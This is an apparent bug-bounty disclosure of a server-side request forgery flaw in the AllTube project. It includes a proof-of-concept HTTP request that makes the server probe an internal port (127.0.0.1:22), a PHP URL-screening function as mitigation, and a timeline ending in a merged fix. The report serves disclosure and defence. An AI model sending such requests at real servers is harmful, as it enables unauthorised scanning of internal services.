Server-Side Request Forgery (SSRF) in rudloff/alltube

Valid

Reported on Feb 26th 2022


Description

Alltube takes the URL from the query parameter and passes it directly to the youtube-dl command. As a result, any unauthenticated attacker can perform an SSRF attack by passing internal hostnames in the URL parameter and obtain information about that service from the response.

Proof of Concept

GET /alltube/index.php/info?url=http://127.0.0.1:22 HTTP/1.1
Host: 127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1/alltube/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=qcnp4gcfj3ni5c02u60ivovj0l
Connection: close

Impact

This vulnerability allows internal port scanning, obtaining sensitive information about services on localhost, and sending requests to them.
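One way to screen the `url` parameter before it reaches youtube-dl, written as an added example: it is not AllTube's code and not the fix merged in 148a17. The function name `isPublicHttpUrl`, its `$resolver` hook and the sample hostnames are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Added example, not AllTube's code. isPublicHttpUrl() and its $resolver
// hook are hypothetical names; the hook lets the check run without DNS.
function isPublicHttpUrl(string $url, ?callable $resolver = null): bool
{
    $parts = parse_url($url);
    if (!is_array($parts) || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    // Allow web schemes only, so file:// and similar never reach the downloader.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    $host = trim($parts['host'], '[]'); // parse_url() keeps IPv6 brackets

    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        $addresses = [$host];
    } else {
        $resolver ??= static function (string $name): array {
            $records = @dns_get_record($name, DNS_A | DNS_AAAA) ?: [];
            return array_map(
                static fn(array $r): string => $r['ip'] ?? $r['ipv6'] ?? '',
                $records
            );
        };
        $addresses = $resolver($host);
    }
    if ($addresses === []) {
        return false; // unresolvable or oddly encoded host: fail closed
    }
    // Every address must be public: one loopback, private, link-local or
    // otherwise reserved answer is enough to reject the URL.
    $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
    foreach ($addresses as $ip) {
        if (filter_var($ip, FILTER_VALIDATE_IP, $flags) === false) {
            return false;
        }
    }
    return true;
}

// Constructed inputs; the resolver below returns canned answers.
$fake = static fn(string $h): array => ['internal.example' => ['10.0.0.5']][$h] ?? ['93.184.216.34'];
var_dump(isPublicHttpUrl('http://127.0.0.1:22', $fake));        // PoC URL from the report
var_dump(isPublicHttpUrl('http://internal.example/', $fake));   // name resolving to a private address
var_dump(isPublicHttpUrl('https://video.example/watch', $fake)); // name resolving to a public address
```

The downloader resolves the hostname again and may follow redirects, so this check narrows the input but does not replace egress filtering on the host that runs youtube-dl.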

We are processing your report and will contact the rudloff/alltube team within 24 hours. 3 months ago
We have contacted a member of the rudloff/alltube team and are waiting to hear back 3 months ago
Pierre Rudloff modified the report 3 months ago
Pierre Rudloff validated this vulnerability 3 months ago
Anna has been awarded the disclosure bounty
The fix bounty is now up for grabs
Pierre Rudloff confirmed that a fix has been merged on 148a17 3 months ago
The fix bounty has been dropped
DownloadController.php#L46 has been validated